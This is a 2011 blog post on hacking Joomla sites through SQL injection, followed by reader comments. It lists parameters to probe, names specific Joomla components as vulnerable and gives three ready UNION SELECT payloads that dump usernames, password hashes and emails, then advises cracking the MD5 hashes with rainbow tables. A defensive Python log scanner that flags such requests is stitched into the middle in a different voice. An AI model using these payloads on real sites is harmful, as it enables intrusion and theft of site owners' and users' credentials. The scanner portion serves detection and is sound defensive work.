WELCOME

For any suggestions, please mail to this ID:

nanduriraja537@gmail.com,raja.mic539@gmail.com

Sunday, May 22, 2011

How to Hack Joomla Website? Joomla SQL Injection Example: Learn Joomla Hacking



Learn Joomla Hacking by Valentin

Probably the most common cause of hacked Joomla websites is an exploited SQL injection vulnerability. A typical URL affected by this type of vulnerability looks like this:

index.php?option=com_blabla&category=5&Item=2

Typically the following parameters are vulnerable:
- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page

To find out whether a parameter is vulnerable, change its value from, e.g., category=5 to category='.

Press enter and look for MySQL errors in the website. If you find one, you might have discovered a SQL injection vulnerability.

To give you a better understanding of, and feeling for, what vulnerable URLs look like, I will show you some URLs which are known to be vulnerable (I discovered them):

URL: index.php?option=com_jp_jobs&view=detail&id=1
Vulnerable parameter: id

URL: index.php?option=com_mv_restaurantmenumanager&task=menu_display\
&Venue=XX&mid=XX&Itemid=XX
Vulnerable parameter: mid

URL: index.php?option=com_qpersonel&task=qpListele&katid=2
Vulnerable parameter: katid

URL: index.php?com_pandafminigames&Itemid=&task=myscores&userid=2
Vulnerable parameter: userid

URL: index.php?option=com_joltcard&Itemid=21&task=view&cardID=6
Vulnerable parameter: cardID

URL: index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62
Vulnerable parameter: catid

URL: index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79
Vulnerable parameter: id

URL: index.php?option=com_nkc&view=insc&lang=en&gp=10
Vulnerable parameter: gp

Notice how many parameters look familiar to you? Yes, I mentioned them
earlier as well-known parameters which are affected on a regular
basis :)

Since every Joomla database contains the same structure (like the same
tables etc.), we know enough to inject a SQL statement:

Example #1:
index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\
SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\
username, password)--

Example #2:
index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\
AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\
8,9,10,11,12--

Example #3:
index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\
group_concat(0x503077337220743020743368206330777321,name,username,\
password,email,usertype,0x503077337220743020743368206330777321)--

The selected information will be shown within the website.
Select a username and password from the table and try to crack the
MD5 hash with the help of rainbow tables.

SQL injections in Joomla give us as much freedom as we can get. You can
select everything you want from the database, and if you are lucky,
there are also other tables in the database which do not belong
to Joomla but still contain some very interesting information.
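
Seen from the defender's side, the quote probe and the UNION SELECT requests described above leave recognisable traces in web server access logs. The following Python script is an added example, not part of the original post: it flags requests where one of the parameters listed earlier carries anything other than an integer, or where any value contains SQL syntax. The log lines are constructed samples, and the names classify, scan and SAMPLE_LOG are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names the article lists as commonly affected, lower-cased.
# In the article's example URLs they all carry plain integers.
INT_PARAMS = {"cat", "category", "kat", "categories", "kats", "cats", "id",
              "userid", "katid", "catid", "item", "entry", "page",
              "mid", "cardid", "gp"}
# Syntax seen in the article's probe and example URLs (heuristic, not a parser).
SQL_SYNTAX = re.compile(r"'|--|\bunion\b.*\bselect\b|\bconcat\s*\(", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return [(parameter, reason)] for one request URL; empty if clean."""
    findings = []
    # parse_qsl decodes %27 and '+', so encoded probes are compared as sent.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if SQL_SYNTAX.search(value):
            findings.append((name, "sql-syntax"))
        elif (name.lower() in INT_PARAMS and value
              and not re.fullmatch(r"[0-9]+", value)):
            findings.append((name, "non-integer"))
    return findings

def scan(log_lines):
    """Return [(client, url, findings)] for every flagged request line."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if match and (found := classify(match.group(1))):
            hits.append((line.split()[0], match.group(1), found))
    return hits

# Constructed sample lines in Apache combined-log style (not real traffic).
SAMPLE_LOG = [
    '198.51.100.4 - - [22/May/2011:10:00:01 +0000] "GET /index.php?option=com_qpersonel&task=qpListele&katid=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/May/2011:10:00:07 +0000] "GET /index.php?option=com_qpersonel&task=qpListele&katid=%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [22/May/2011:10:00:15 +0000] "GET /index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+1,2,3-- HTTP/1.1" 200 4801',
    '198.51.100.4 - - [22/May/2011:10:00:20 +0000] "GET /index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=2 HTTP/1.1" 200 3300',
]

if __name__ == "__main__":
    for client, url, found in scan(SAMPLE_LOG):
        print(client, url, found)
```

The integer check is the stronger signal here: it needs no SQL keyword list and also catches probes the regular expression does not anticipate.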

5 comments:

  1. I have been looking on the World Wide Web for this information. This article is very informative. Thanks for sharing your excellent views on how to hack joomla website.
  2. Modules are one of the main features of Joomla for many users. They allow website developers and owners to add user-friendly functionality like login boxes without additional coding.
  3. I could not believe this coding would be helpful to hack the Joomla based websites.
  4. The importance of having a website is to gain additional support for something others might not understand or realize existed.
  5. I am really glad to read all the information of this blog because it provides such essential tips regarding web development.